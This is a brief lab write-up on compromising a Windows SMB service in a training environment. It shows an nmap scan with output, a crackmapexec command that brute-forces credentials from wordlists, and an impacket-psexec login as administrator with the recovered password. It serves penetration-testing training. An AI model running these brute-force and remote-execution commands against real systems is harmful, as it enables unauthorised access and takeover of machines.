Exploiting SMB With PsExec

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at demo.ine.local.

Objective: Exploit the SMB service with PsExec and retrieve the flag.

Tools

• Nmap

• Metasploit

Writeup

nmap -sSVC demo.ine.local

PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=EC2AMAZ-408S766
| Not valid before: 2025-06-09T17:54:00
|_Not valid after:  2025-12-09T17:54:00
|_ssl-date: 2025-06-10T17:56:19+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: EC2AMAZ-408S766
|   NetBIOS_Domain_Name: EC2AMAZ-408S766
|   NetBIOS_Computer_Name: EC2AMAZ-408S766
|   DNS_Domain_Name: EC2AMAZ-408S766
|   DNS_Computer_Name: EC2AMAZ-408S766
|   Product_Version: 10.0.14393
|_  System_Time: 2025-06-10T17:56:11+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-06-10T17:56:12
|_  start_date: 2025-06-10T17:54:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

crackmapexec smb demo.ine.local -u /usr/share/wordlists/metasploit/common_users.txt -p /usr/share/wordlists/metasploit/unix_passwords.txt --continue-on-success | grep "+"

impacket-psexec EC2AMAZ-408S766/administrator:qwertyuiop@demo.ine.local